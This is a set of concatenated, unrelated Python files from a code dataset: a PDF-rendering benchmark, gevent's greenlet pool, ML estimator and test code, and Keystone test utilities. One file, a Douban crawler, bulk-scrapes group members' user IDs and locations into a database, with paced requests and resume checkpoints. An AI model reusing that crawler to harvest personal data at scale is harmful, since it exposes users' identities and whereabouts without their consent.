fs, fe = '<font color="red" size="+2">', '</font>'
n = len(txt)
for i in range(n):
if 'a'<=txt[i]<='z' or 'A'<=txt[i]<='Z':
txt = (txt[:i]+(fs+txt[i]+fe))+txt[i+1:]
break
if _REDCAP>=2 and n>20:
j = i+len(fs)+len(fe)+1+int((n-1)/2)
while not ('a'<=txt[j]<='z' or 'A'<=txt[j]<='Z'): j += 1
txt = (txt[:j]+('<b><i><font size="+2" color="blue">'+txt[j]+'</font></i></b>'))+txt[j+1:]
if _REDCAP==3 and n>20:
n = len(txt)
fs = '<font color="green" size="+1">'
for i in range(n-1,-1,-1):
if 'a'<=txt[i]<='z' or 'A'<=txt[i]<='Z':
txt = txt[:i]+((fs+txt[i]+fe)+txt[i+1:])
break
Elements.append(Paragraph(txt, style))
firstPre = 1
def pre(txt, style=PreStyle):
global firstPre
if firstPre:
Elements.append(NextPageTemplate('OneCol'))
newPage()
firstPre = 0
spacer(0.1)
p = Preformatted(txt, style)
Elements.append(p)
def parseOdyssey(fn):
from time import time
E = []
t0=time()
text = open(fn,'r').read()
i0 = text.index('Book I')
endMarker = 'covenant of peace between the two contending parties.'
i1 = text.index(endMarker)+len(endMarker)
PREAMBLE=list(map(str.strip,text[0:i0].split('\n')))
L=list(map(str.strip,text[i0:i1].split('\n')))
POSTAMBLE=list(map(str.strip,text[i1:].split('\n')))
def ambleText(L):
while L and not L[0]: L.pop(0)
while L:
T=[]
while L and L[0]:
T.append(L.pop(0))
yield T
while L and not L[0]: L.pop(0)
def mainText(L):
while L:
B = L.pop(0)
while not L[0]: L.pop(0)
T=[]
while L and L[0]:
T.append(L.pop(0))
while not L[0]: L.pop(0)
P = []
while L and not (L[0].startswith('Book ') and len(L[0].split())==2):
E=[]
while L and L[0]:
E.append(L.pop(0))
P.append(E)
if L:
while not L[0]: L.pop(0)
yield B,T,P
t1 = time()
print("open(%s,'r').read() took %.4f seconds" %(fn,t1-t0))
E.append([spacer,2])
E.append([fTitle,'<font color="red">%s</font>' % Title, InitialStyle])
E.append([fTitle,'<font size="-4">by</font> <font color="green">%s</font>' % Author, InitialStyle])
for T in ambleText(PREAMBLE):
E.append([p,'\n'.join(T)])
for (B,T,P) in mainText(L):
E.append([chapter,B])
E.append([p,'<font size="+1" color="Blue"><b>%s</b></font>' % '\n'.join(T),ParaStyle])
for x in P:
E.append([p,' '.join(x)])
firstPre = 1
for T in ambleText(POSTAMBLE):
E.append([p,'\n'.join(T)])
t3 = time()
print("Parsing into memory took %.4f seconds" %(t3-t1))
del L
t4 = time()
print("Deleting list of lines took %.4f seconds" %(t4-t3))
for i in range(len(E)):
E[i][0](*E[i][1:])
t5 = time()
print("Moving into platypus took %.4f seconds" %(t5-t4))
del E
t6 = time()
print("Deleting list of actions took %.4f seconds" %(t6-t5))
go()
t7 = time()
print("saving to PDF took %.4f seconds" %(t7-t6))
print("Total run took %.4f seconds"%(t7-t0))
import hashlib
print('file digest: %s' % hashlib.md5(open('dodyssey.pdf','rb').read()).hexdigest())
def run():
for fn in ('odyssey.full.txt','odyssey.txt'):
if os.path.isfile(fn):
parseOdyssey(fn)
break
def doProf(profname,func,*args,**kwd):
import hotshot, hotshot.stats
prof = hotshot.Profile(profname)
prof.runcall(func)
prof.close()
stats = hotshot.stats.load(profname)
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(20)
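# Note (added comment): doProf() relies on the hotshot profiler, which only exists in
# Python 2; on Python 3 the --prof path would need to be rewritten with cProfile/pstats.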
if __name__=='__main__':
if '--prof' in sys.argv:
doProf('dodyssey.prof',run)
else:
run()
| 2.203125 | 2 |
tests/test_fred_fred_view.py | Traceabl3/GamestonkTerminal | 0 | 6976 | """ econ/fred_view.py tests """
import unittest
from unittest import mock
from io import StringIO
import pandas as pd
# pylint: disable=unused-import
from gamestonk_terminal.econ.fred_view import get_fred_data # noqa: F401
fred_data_mock = """
,GDP
2019-01-01,21115.309
2019-04-01,21329.877
2019-07-01,21540.325
2019-10-01,21747.394
2020-01-01,21561.139
2020-04-01,19520.114
2020-07-01,21170.252
2020-10-01,21494.731
"""
class TestFredFredView(unittest.TestCase):
@mock.patch("gamestonk_terminal.econ.fred_view.Fred.get_series")
def test_get_fred_data(self, mock_get_series):
fred_data = pd.read_csv(StringIO(fred_data_mock), header=0, index_col=0)
mock_get_series.return_value = fred_data
get_fred_data(["--noplot"], "gdp")
| 2.71875 | 3 |
python27/1.0/lib/linux/gevent/pool.py | jt6562/XX-Net | 2 | 6977 | # Copyright (c) 2009-2010 <NAME>. See LICENSE for details.
"""Managing greenlets in a group.
The :class:`Group` class in this module abstracts a group of running greenlets.
When a greenlet dies, it's automatically removed from the group.
The :class:`Pool` class, which is a subclass of :class:`Group`, provides a way to limit
concurrency: its :meth:`spawn <Pool.spawn>` method blocks if the number of
greenlets in the pool has already reached the limit, until there is a free slot.
"""
from gevent.hub import GreenletExit, getcurrent
from gevent.greenlet import joinall, Greenlet
from gevent.timeout import Timeout
from gevent.event import Event
from gevent.coros import Semaphore, DummySemaphore
__all__ = ['Group', 'Pool']
class Group(object):
"""Maintain a group of greenlets that are still running.
Links to each item and removes it upon notification.
"""
greenlet_class = Greenlet
def __init__(self, *args):
assert len(args) <= 1, args
self.greenlets = set(*args)
if args:
for greenlet in args[0]:
greenlet.rawlink(self.discard)
# each item we kill we place in dying, to avoid killing the same greenlet twice
self.dying = set()
self._empty_event = Event()
self._empty_event.set()
def __repr__(self):
try:
classname = self.__class__.__name__
except AttributeError:
classname = 'Group' # XXX check if 2.4 really uses this line
return '<%s at %s %s>' % (classname, hex(id(self)), self.greenlets)
def __len__(self):
return len(self.greenlets)
def __contains__(self, item):
return item in self.greenlets
def __iter__(self):
return iter(self.greenlets)
def add(self, greenlet):
greenlet.rawlink(self.discard)
self.greenlets.add(greenlet)
self._empty_event.clear()
def discard(self, greenlet):
self.greenlets.discard(greenlet)
self.dying.discard(greenlet)
if not self.greenlets:
self._empty_event.set()
def start(self, greenlet):
self.add(greenlet)
greenlet.start()
def spawn(self, *args, **kwargs):
add = self.add
greenlet = self.greenlet_class.spawn(*args, **kwargs)
add(greenlet)
return greenlet
def spawn_link(self, *args, **kwargs):
greenlet = self.spawn(*args, **kwargs)
greenlet.link()
return greenlet
def spawn_link_value(self, *args, **kwargs):
greenlet = self.spawn(*args, **kwargs)
greenlet.link_value()
return greenlet
def spawn_link_exception(self, *args, **kwargs):
greenlet = self.spawn(*args, **kwargs)
greenlet.link_exception()
return greenlet
# def close(self):
# """Prevents any more tasks from being submitted to the pool"""
# self.add = RaiseException("This %s has been closed" % self.__class__.__name__)
def join(self, timeout=None, raise_error=False):
if raise_error:
greenlets = self.greenlets.copy()
self._empty_event.wait(timeout=timeout)
for greenlet in greenlets:
if greenlet.exception is not None:
raise greenlet.exception
else:
self._empty_event.wait(timeout=timeout)
def kill(self, exception=GreenletExit, block=True, timeout=None):
timer = Timeout.start_new(timeout)
try:
try:
while self.greenlets:
for greenlet in list(self.greenlets):
if greenlet not in self.dying:
greenlet.kill(exception, block=False)
self.dying.add(greenlet)
if not block:
break
joinall(self.greenlets)
except Timeout, ex:
if ex is not timer:
raise
finally:
timer.cancel()
def killone(self, greenlet, exception=GreenletExit, block=True, timeout=None):
if greenlet not in self.dying and greenlet in self.greenlets:
greenlet.kill(exception, block=False)
self.dying.add(greenlet)
if block:
greenlet.join(timeout)
def apply(self, func, args=None, kwds=None):
"""Equivalent of the apply() builtin function. It blocks till the result is ready."""
if args is None:
args = ()
if kwds is None:
kwds = {}
if getcurrent() in self:
return func(*args, **kwds)
else:
return self.spawn(func, *args, **kwds).get()
def apply_cb(self, func, args=None, kwds=None, callback=None):
result = self.apply(func, args, kwds)
if callback is not None:
Greenlet.spawn(callback, result)
return result
def apply_async(self, func, args=None, kwds=None, callback=None):
"""A variant of the apply() method which returns a Greenlet object.
If callback is specified then it should be a callable which accepts a single argument. When the result becomes ready
callback is applied to it (unless the call failed)."""
if args is None:
args = ()
if kwds is None:
kwds = {}
if self.full():
# cannot call spawn() directly because it will block
return Greenlet.spawn(self.apply_cb, func, args, kwds, callback)
else:
greenlet = self.spawn(func, *args, **kwds)
if callback is not None:
greenlet.link(pass_value(callback))
return greenlet
def map(self, func, iterable):
greenlets = [self.spawn(func, item) for item in iterable]
return [greenlet.get() for greenlet in greenlets]
def map_cb(self, func, iterable, callback=None):
result = self.map(func, iterable)
if callback is not None:
callback(result)
return result
def map_async(self, func, iterable, callback=None):
"""
A variant of the map() method which returns a Greenlet object.
If callback is specified then it should be a callable which accepts a
single argument.
"""
return Greenlet.spawn(self.map_cb, func, iterable, callback)
def imap(self, func, iterable):
"""An equivalent of itertools.imap()
**TODO**: Fix this.
"""
return iter(self.map(func, iterable))
def imap_unordered(self, func, iterable):
"""The same as imap() except that the ordering of the results from the
        returned iterator should be considered arbitrary."""
return IMapUnordered.spawn(self.spawn, func, iterable)
def full(self):
return False
def wait_available(self):
pass
class IMapUnordered(Greenlet):
def __init__(self, spawn, func, iterable):
from gevent.queue import Queue
Greenlet.__init__(self)
self.spawn = spawn
self.func = func
self.iterable = iterable
self.queue = Queue()
self.count = 0
def __iter__(self):
return self.queue
def _run(self):
try:
func = self.func
for item in self.iterable:
self.count += 1
self.spawn(func, item).rawlink(self._on_result)
finally:
self.__dict__.pop('spawn', None)
self.__dict__.pop('func', None)
self.__dict__.pop('iterable', None)
def _on_result(self, greenlet):
self.count -= 1
if greenlet.successful():
self.queue.put(greenlet.value)
if self.ready() and self.count <= 0:
self.queue.put(StopIteration)
def GreenletSet(*args, **kwargs):
import warnings
warnings.warn("gevent.pool.GreenletSet was renamed to gevent.pool.Group since version 0.13.0", DeprecationWarning, stacklevel=2)
return Group(*args, **kwargs)
class Pool(Group):
def __init__(self, size=None, greenlet_class=None):
if size is not None and size < 1:
raise ValueError('Invalid size for pool (positive integer or None required): %r' % (size, ))
Group.__init__(self)
self.size = size
if greenlet_class is not None:
self.greenlet_class = greenlet_class
if size is None:
self._semaphore = DummySemaphore()
else:
self._semaphore = Semaphore(size)
def wait_available(self):
self._semaphore.wait()
def full(self):
return self.free_count() <= 0
def free_count(self):
if self.size is None:
return 1
return max(0, self.size - len(self))
def start(self, greenlet):
self._semaphore.acquire()
try:
self.add(greenlet)
except:
self._semaphore.release()
raise
greenlet.start()
def spawn(self, *args, **kwargs):
self._semaphore.acquire()
try:
greenlet = self.greenlet_class.spawn(*args, **kwargs)
self.add(greenlet)
except:
self._semaphore.release()
raise
return greenlet
def spawn_link(self, *args, **kwargs):
self._semaphore.acquire()
try:
greenlet = self.greenlet_class.spawn_link(*args, **kwargs)
self.add(greenlet)
except:
self._semaphore.release()
raise
return greenlet
def spawn_link_value(self, *args, **kwargs):
self._semaphore.acquire()
try:
greenlet = self.greenlet_class.spawn_link_value(*args, **kwargs)
self.add(greenlet)
except:
self._semaphore.release()
raise
return greenlet
def spawn_link_exception(self, *args, **kwargs):
self._semaphore.acquire()
try:
greenlet = self.greenlet_class.spawn_link_exception(*args, **kwargs)
self.add(greenlet)
except:
self._semaphore.release()
raise
return greenlet
def discard(self, greenlet):
Group.discard(self, greenlet)
self._semaphore.release()
def get_values(greenlets):
joinall(greenlets)
return [x.value for x in greenlets]
class pass_value(object):
__slots__ = ['callback']
def __init__(self, callback):
self.callback = callback
def __call__(self, source):
if source.successful():
self.callback(source.value)
def __hash__(self):
return hash(self.callback)
def __eq__(self, other):
return self.callback == getattr(other, 'callback', other)
def __str__(self):
return str(self.callback)
def __repr__(self):
return repr(self.callback)
def __getattr__(self, item):
assert item != 'callback'
return getattr(self.callback, item)
| 2.953125 | 3 |
lecarb/estimator/lw/lw_tree.py | anshumandutt/AreCELearnedYet | 34 | 6978 | <gh_stars>10-100
import time
import logging
from typing import Dict, Any, Tuple
import pickle
import numpy as np
import xgboost as xgb
from .common import load_lw_dataset, encode_query, decode_label
from ..postgres import Postgres
from ..estimator import Estimator
from ..utils import evaluate, run_test
from ...dataset.dataset import load_table
from ...workload.workload import Query
from ...constants import MODEL_ROOT, NUM_THREADS, PKL_PROTO
L = logging.getLogger(__name__)
class Args:
def __init__(self, **kwargs):
self.trees = 16
self.bins = 200
self.train_num = 10000
# overwrite parameters from user
self.__dict__.update(kwargs)
def train_lw_tree(seed, dataset, version, workload, params, sizelimit):
np.random.seed(seed)
    # convert parameter dict of lw(tree)
L.info(f"params: {params}")
args = Args(**params)
valid_num = args.train_num // 10
table = load_table(dataset, version)
dataset = load_lw_dataset(table, workload, seed, args.bins)
train_X, train_y, _ = dataset['train']
valid_X, valid_y, valid_gt = dataset['valid']
# Train model
model_path = MODEL_ROOT / table.dataset
model_path.mkdir(parents=True, exist_ok=True)
model_file = model_path / f"{table.version}_{workload}-lwxgb_tr{args.trees}_bin{args.bins}_{args.train_num//1000}k-{seed}.pkl"
L.info(f"Start training...")
start_stmp = time.time()
model = xgb.XGBRegressor(objective='reg:squarederror', n_estimators=args.trees, random_state=seed, n_jobs=NUM_THREADS)
model.fit(train_X[:args.train_num], train_y[:args.train_num], eval_set=[(valid_X[:valid_num], valid_y[:valid_num])])
dur_min = (time.time() - start_stmp) / 60
L.info(f"Finish training, time since start: {dur_min:.4f} mins")
L.info(f"Run on valid set...")
preds = np.maximum(np.round(decode_label(model.predict(valid_X[:valid_num]))), 0.0)
gts = valid_gt[:valid_num]
L.info("Q-Error on validation set:")
_, metrics = evaluate(preds, gts)
state = {
'seed': seed,
'args': args,
'device': 'cpu',
'threads': NUM_THREADS,
'dataset': table.dataset,
'version': table.version,
'workload': workload,
'model': model,
'train_time': dur_min,
'valid_error': {workload: metrics}
# 'model_size': model_size,
}
with open(model_file, 'wb') as f:
pickle.dump(state, f, protocol=PKL_PROTO)
L.info(f'All finished! Time spent since training start: {(time.time()-start_stmp)/60:.2f} mins')
L.info(f"Model saved to {model_file}")
class LWTree(Estimator):
def __init__(self, model, model_name, pg_est, table):
super(LWTree, self).__init__(table=table, model=model_name)
self.model = model
self.pg_est = pg_est
def query(self, query):
if isinstance(query, Query):
query = encode_query(self.table, query, self.pg_est)
return self.query_vector(np.expand_dims(query, axis=0))
def query_vector(self, vec):
start_stmp = time.time()
pred = self.model.predict(vec).item()
dur_ms = (time.time() - start_stmp) * 1e3
return np.maximum(np.round(decode_label(pred)), 0.0), dur_ms
def load_lw_tree(dataset: str, model_name: str) -> Tuple[Estimator, Dict[str, Any]]:
model_file = MODEL_ROOT / dataset / f"{model_name}.pkl"
L.info(f"load model from {model_file} ...")
with open(model_file, 'rb') as f:
state = pickle.load(f)
# load model
args = state['args']
model = state['model']
table = load_table(dataset, state['version'])
pg_est = Postgres(table, args.bins, state['seed'])
estimator = LWTree(model, model_name, pg_est, table)
return estimator, state
def test_lw_tree(dataset: str, version: str, workload: str, params: Dict[str, Any], overwrite: bool) -> None:
"""
params:
model: model file name
        use_cache: load processed vectors directly instead of building them from queries
"""
# uniform thread number
model_file = MODEL_ROOT / dataset / f"{params['model']}.pkl"
L.info(f"Load model from {model_file} ...")
with open(model_file, 'rb') as f:
state = pickle.load(f)
    # load corresponding version of table
table = load_table(dataset, state['version'])
# load model
args = state['args']
model = state['model']
pg_est = Postgres(table, args.bins, state['seed'])
estimator = LWTree(model, params['model'], pg_est, table)
L.info(f"Load and built lw(tree) estimator: {estimator}")
if params['use_cache']:
        # the test table might have a different version than the training table
test_table = load_table(dataset, version)
lw_dataset = load_lw_dataset(test_table, workload, state['seed'], args.bins)
X, _, gt = lw_dataset['test']
run_test(dataset, version, workload, estimator, overwrite, lw_vec=(X, gt))
else:
run_test(dataset, version, workload, estimator, overwrite)
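# Usage sketch (illustrative; this module is normally driven by the project's
# command-line entry point, and the dataset/workload names below are placeholders):
#
#     params = {'trees': 16, 'bins': 200, 'train_num': 10000}
#     train_lw_tree(seed=123, dataset='<dataset>', version='<version>',
#                   workload='<workload>', params=params, sizelimit=0)
#     test_lw_tree('<dataset>', '<version>', '<workload>',
#                  params={'model': '<saved-model-name>', 'use_cache': True},
#                  overwrite=False)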
| 2.125 | 2 |
fsim/utils.py | yamasampo/fsim | 0 | 6979 |
import os
import configparser
from warnings import warn
def read_control_file(control_file):
# Initialize ConfigParser object
config = configparser.ConfigParser(
strict=True,
comment_prefixes=('/*', ';', '#'),
inline_comment_prefixes=('/*', ';', '#')
)
# Parse control file
paths = config.read(control_file)
# Check number of read control files.
if len(paths) == 0:
raise FileNotFoundError(
f'Specified control file, {control_file}, is not found.')
elif len(paths) > 1:
raise TypeError(f'Iterable {type(control_file)} is given as a control '\
'file. Only one control file is supported.')
# Check sections. Only 'REQUIRED' and 'OPTIONAL' sections will be used.
assert 'REQUIRED' in config.sections(), \
f'REQUIRED section is not found in {control_file}.'
expected_sections = ['REQUIRED', 'OPTIONAL']
not_expected_sections = [
s for s in config.sections() if s not in expected_sections]
if len(not_expected_sections) >= 1:
msg = f'Unexpected sections, {", ".join(not_expected_sections)}, '\
'were found. These are not used in '\
'the analysis. If you wish to include in the analysis, please '\
'specify in "REQUIRED" or "OPTIONAL" sections.'
warn(msg)
converters_d = {
'pop_size': int,
'ns': float,
'init_mut_num': int,
'generation_num': int,
'total_site_num': int,
'var_site_num': int,
'poly_site_num': int,
'fix_site_num': int,
'output_only_fixation': lambda s: True if s == 'True' else (False if s == 'False' else -9)
}
flattened = [
(opt, converters_d[opt](v))
if opt in converters_d.keys() else (opt, v)
for s in expected_sections
for opt, v in config[s].items()
]
return dict(flattened)
def write_info_to_file(file_handle, separator, *args, **kw_args):
""" Write arguments or keyword arguments to a file. Values will be
separated by a given separator.
"""
output_lines = []
if len(args) > 0:
output_lines.append(separator.join(args))
if len(kw_args) > 0:
for k, v in kw_args.items():
output_lines.append(f'{k}{separator}{v}')
print('\n'.join(output_lines), file=file_handle)
def write_settings(file_handle, **kw_args):
print('[Setting]', file=file_handle)
write_info_to_file(file_handle, separator=' = ', **kw_args)
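# The demo below is a small, self-contained sketch of how read_control_file is
# expected to be used; the option names mirror the converters_d keys above, while
# the values and the temporary-file handling are illustrative, not part of fsim.
if __name__ == '__main__':
    import tempfile

    _example = """
[REQUIRED]
pop_size = 100
ns = -0.5
init_mut_num = 1
generation_num = 500
total_site_num = 1000

[OPTIONAL]
output_only_fixation = True
"""
    with tempfile.NamedTemporaryFile('w', suffix='.ctl', delete=False) as fp:
        fp.write(_example)
        path = fp.name
    # parsed values are converted per converters_d, e.g. pop_size -> int
    print(read_control_file(path))
    os.remove(path)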
| 2.6875 | 3 |
src/pymortests/function.py | mahgadalla/pymor | 1 | 6980 | # This file is part of the pyMOR project (http://www.pymor.org).
# Copyright 2013-2017 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
import numpy as np
import pytest
from pymor.core.pickle import dumps, loads
from pymor.functions.basic import ConstantFunction, GenericFunction
from pymortests.fixtures.function import function, picklable_function, function_argument
from pymortests.fixtures.parameter import parameters_of_type
from pymortests.pickling import assert_picklable, assert_picklable_without_dumps_function
# monkey-patch np.testing.assert_allclose to behave the same as np.allclose
# for some reason, the default atol of np.testing.assert_allclose is 0
# while it is 1e-8 for np.allclose
real_assert_allclose = np.testing.assert_allclose
def monkey_allclose(a, b, rtol=1.e-5, atol=1.e-8):
real_assert_allclose(a, b, rtol=rtol, atol=atol)
np.testing.assert_allclose = monkey_allclose
def test_evaluate(function):
f = function
mus = parameters_of_type(f.parameter_type, 4711)
for count in [0, 1, 5, (0, 1), (2, 2, 2)]:
arg = function_argument(f, count, 454)
result = f.evaluate(arg, next(mus))
assert result.shape == arg.shape[:-1] + f.shape_range
def test_lincomb_function():
for steps in (1, 10):
x = np.linspace(0, 1, num=steps)
zero = ConstantFunction(0.0, dim_domain=steps)
for zero in (ConstantFunction(0.0, dim_domain=steps),
GenericFunction(lambda X: np.zeros(X.shape[:-1]), dim_domain=steps)):
for one in (ConstantFunction(1.0, dim_domain=steps),
GenericFunction(lambda X: np.ones(X.shape[:-1]), dim_domain=steps), 1.0):
add = (zero + one) + 0
sub = (zero - one) + np.zeros(())
neg = - zero
assert np.allclose(sub(x), [-1])
assert np.allclose(add(x), [1.0])
assert np.allclose(neg(x), [0.0])
(repr(add), str(add), repr(one), str(one)) # just to cover the respective special funcs too
mul = neg * 1.
assert np.allclose(mul(x), [0.0])
with pytest.raises(AssertionError):
zero + ConstantFunction(dim_domain=steps + 1)
with pytest.raises(AssertionError):
zero * ConstantFunction(dim_domain=steps)
with pytest.raises(AssertionError):
ConstantFunction(dim_domain=0)
def test_pickle(function):
assert_picklable(function)
def test_pickle_without_dumps_function(picklable_function):
assert_picklable_without_dumps_function(picklable_function)
def test_pickle_by_evaluation(function):
f = function
f2 = loads(dumps(f))
mus = parameters_of_type(f.parameter_type, 47)
for arg in function_argument(f, 10, 42):
mu = next(mus)
assert np.all(f.evaluate(arg, mu) == f2.evaluate(arg, mu))
| 2.25 | 2 |
Code/userIDCrawler.py | CarberZ/social-media-mining | 2 | 6981 | <reponame>CarberZ/social-media-mining
'''
step 1
get the userID and their locations
put them all into a database
'''
from bs4 import BeautifulSoup
import urllib
import sqlite3
from selenium import webdriver
import time
import re
from urllib import request
import random
import pickle
import os
import pytesseract
url_dog = "https://www.douban.com/group/lovelydog/members?start="
url_cat = "https://www.douban.com/group/cat/members?start="
'''
cat = 1 ~ 336770
dog = 1 ~ 156240
'''
class getInfo(object):
memberList = []
type = None
url = None
memberNumber = 0
conn = None
cursor = None
def __init__(self, type):
getInfo.type = type
if type == "cat":
getInfo.url = url_cat
getInfo.memberNumber = 336770
else:
getInfo.url = url_dog
getInfo.memberNumber = 156240
dbName = "CDPeopleDB.sqlite"
        # initiate the start point (create the checkpoint file if it does not exist)
        if not os.path.isfile('stopPoint.pickle'):
            with open('stopPoint.pickle', 'wb') as file:
                pickle.dump(1, file)
conn = sqlite3.connect(dbName)
getInfo.conn = conn
getInfo.cursor = getInfo.conn.cursor()
# if getInfo.type == 'dog':
# getInfo.cursor.execute("drop table if exists DogPeople")
# getInfo.cursor.execute("create table DogPeople(id varchar(48), location varchar(48))")
# else:
# getInfo.cursor.execute("drop table if exists CatPeople")
# getInfo.cursor.execute("create table CatPeople(id varchar(48), location varchar(48))")
def sliceContent(self, pageContent):
pageContent = re.sub(r"<ul>(.*)</ul>", "\\1", pageContent.replace("\n", ""))
# print(pageContent)
memberList = re.sub(r'<li class=""> (.*?) </li>', "\\1mark", pageContent.strip())
memberList = re.split(r"mark", memberList)
for member in memberList:
if member.strip() != '':
inforContent = re.findall(r'<div class="name">(.*?)</div>', member)
if len(inforContent)!= 0:
inforContent = inforContent[0].strip()
                    identity = re.findall(r'https://www.douban.com/people/(.*?)/', inforContent)
                    if len(identity) != 0:
                        id = identity[0]
location = re.findall(r'<span class="pl">\((.*?)\)</span>', inforContent)
if len(location) != 0:
coordinate = str(location[0])
else:
coordinate = 'Unknown'
else:
continue
if getInfo.type == 'dog':
getInfo.cursor.execute("insert into DogPeople values(?, ?)", (id, coordinate))
else:
getInfo.cursor.execute("insert into CatPeople values(?, ?)", (id, coordinate))
getInfo.conn.commit()
def crawler(self):
opener = urllib.request.build_opener(urllib.request.HTTPSHandler)
header = ("User-Agent",
" Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36")
opener.addheaders = [header]
driver = webdriver.Chrome()
driver.get(getInfo.url)
time.sleep(20)
        # store the current position in case something goes wrong during crawling
        with open('stopPoint.pickle', 'rb') as file:
            startPoint = pickle.load(file)
        # use the record as the start position
for i in range(startPoint, getInfo.memberNumber, 35):
driver.get(getInfo.url+str(i))
page = driver.page_source
soup = BeautifulSoup(page, "html5lib")
print(i)
with open('stopPoint.pickle', 'wb') as file:
pickle.dump(i, file)
memberList = soup.find('div', {'class': 'member-list'}).ul
content = str(memberList)
getInfo.sliceContent(self, pageContent=content)
time.sleep(2+random.random())
# info_dog = getInfo("dog")
# info_dog.crawler()
info_cat = getInfo("cat")
info_cat.crawler()
'''
create table CatPeople
as
select distinct *
from CatPeople_backup
WHERE not location GLOB '*[A-Za-z]*';
pre-processing to delete locations out of China
'''
| 2.9375 | 3 |
src/stoat/core/structure/__init__.py | saarkatz/guppy-struct | 1 | 6982 | <gh_stars>1-10
from .structure import Structure
| 1.039063 | 1 |
tbase/network/polices_test.py | iminders/TradeBaselines | 16 | 6983 | <reponame>iminders/TradeBaselines<filename>tbase/network/polices_test.py
import unittest
import numpy as np
from tbase.common.cmd_util import set_global_seeds
from tbase.network.polices import RandomPolicy
class TestPolices(unittest.TestCase):
@classmethod
def setUpClass(self):
set_global_seeds(0)
def test_random_policy(self):
policy = RandomPolicy(2)
# action 1
actual = policy.select_action([])
expected = [1.0, -0.2534131770209437]
self.assertEqual(expected, list(actual.astype(np.float)))
# action 2
actual = policy.select_action([])
expected = [-1.0, 0.8324962832376306]
self.assertEqual(expected, list(actual.astype(np.float)))
if __name__ == '__main__':
unittest.main()
| 2.4375 | 2 |
keystone/tests/unit/core.py | knikolla/keystone | 0 | 6984 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import atexit
import base64
import contextlib
import datetime
import functools
import hashlib
import json
import ldap
import os
import shutil
import socket
import sys
import uuid
import warnings
import fixtures
import flask
from flask import testing as flask_testing
import http.client
from oslo_config import fixture as config_fixture
from oslo_context import context as oslo_context
from oslo_context import fixture as oslo_ctx_fixture
from oslo_log import fixture as log_fixture
from oslo_log import log
from oslo_utils import timeutils
from sqlalchemy import exc
import testtools
from testtools import testcase
import keystone.api
from keystone.common import context
from keystone.common import json_home
from keystone.common import provider_api
from keystone.common import sql
import keystone.conf
from keystone import exception
from keystone.identity.backends.ldap import common as ks_ldap
from keystone import notifications
from keystone.resource.backends import base as resource_base
from keystone.server.flask import application as flask_app
from keystone.server.flask import core as keystone_flask
from keystone.tests.unit import ksfixtures
keystone.conf.configure()
keystone.conf.set_config_defaults()
PID = str(os.getpid())
TESTSDIR = os.path.dirname(os.path.abspath(__file__))
TESTCONF = os.path.join(TESTSDIR, 'config_files')
ROOTDIR = os.path.normpath(os.path.join(TESTSDIR, '..', '..', '..'))
VENDOR = os.path.join(ROOTDIR, 'vendor')
ETCDIR = os.path.join(ROOTDIR, 'etc')
def _calc_tmpdir():
env_val = os.environ.get('KEYSTONE_TEST_TEMP_DIR')
if not env_val:
return os.path.join(TESTSDIR, 'tmp', PID)
return os.path.join(env_val, PID)
TMPDIR = _calc_tmpdir()
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
log.register_options(CONF)
IN_MEM_DB_CONN_STRING = 'sqlite://'
# Strictly matches ISO 8601 timestamps with subsecond precision like:
# 2016-06-28T20:48:56.000000Z
TIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
TIME_FORMAT_REGEX = r'^\d{4}-[0-1]\d-[0-3]\dT[0-2]\d:[0-5]\d:[0-5]\d\.\d{6}Z$'
exception._FATAL_EXCEPTION_FORMAT_ERRORS = True
os.makedirs(TMPDIR)
atexit.register(shutil.rmtree, TMPDIR)
class dirs(object):
@staticmethod
def root(*p):
return os.path.join(ROOTDIR, *p)
@staticmethod
def etc(*p):
return os.path.join(ETCDIR, *p)
@staticmethod
def tests(*p):
return os.path.join(TESTSDIR, *p)
@staticmethod
def tmp(*p):
return os.path.join(TMPDIR, *p)
@staticmethod
def tests_conf(*p):
return os.path.join(TESTCONF, *p)
@atexit.register
def remove_test_databases():
db = dirs.tmp('test.db')
if os.path.exists(db):
os.unlink(db)
pristine = dirs.tmp('test.db.pristine')
if os.path.exists(pristine):
os.unlink(pristine)
def skip_if_cache_disabled(*sections):
"""Skip a test if caching is disabled, this is a decorator.
Caching can be disabled either globally or for a specific section.
In the code fragment::
        @skip_if_cache_disabled('assignment', 'token')
def test_method(*args):
...
The method test_method would be skipped if caching is disabled globally via
the `enabled` option in the `cache` section of the configuration or if
the `caching` option is set to false in either `assignment` or `token`
sections of the configuration. This decorator can be used with no
arguments to only check global caching.
If a specified configuration section does not define the `caching` option,
    this decorator treats caching as enabled if the `enabled` option in the `cache`
section of the configuration is true.
"""
def wrapper(f):
@functools.wraps(f)
def inner(*args, **kwargs):
if not CONF.cache.enabled:
raise testcase.TestSkipped('Cache globally disabled.')
for s in sections:
conf_sec = getattr(CONF, s, None)
if conf_sec is not None:
if not getattr(conf_sec, 'caching', True):
raise testcase.TestSkipped('%s caching disabled.' % s)
return f(*args, **kwargs)
return inner
return wrapper
def skip_if_cache_is_enabled(*sections):
def wrapper(f):
@functools.wraps(f)
def inner(*args, **kwargs):
if CONF.cache.enabled:
for s in sections:
conf_sec = getattr(CONF, s, None)
if conf_sec is not None:
if getattr(conf_sec, 'caching', True):
raise testcase.TestSkipped('%s caching enabled.' %
s)
return f(*args, **kwargs)
return inner
return wrapper
def skip_if_no_multiple_domains_support(f):
"""Decorator to skip tests for identity drivers limited to one domain."""
@functools.wraps(f)
def wrapper(*args, **kwargs):
test_obj = args[0]
if not test_obj.identity_api.multiple_domains_supported:
raise testcase.TestSkipped('No multiple domains support')
return f(*args, **kwargs)
return wrapper
class UnexpectedExit(Exception):
pass
def new_region_ref(parent_region_id=None, **kwargs):
ref = {
'id': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'parent_region_id': parent_region_id}
ref.update(kwargs)
return ref
def new_service_ref(**kwargs):
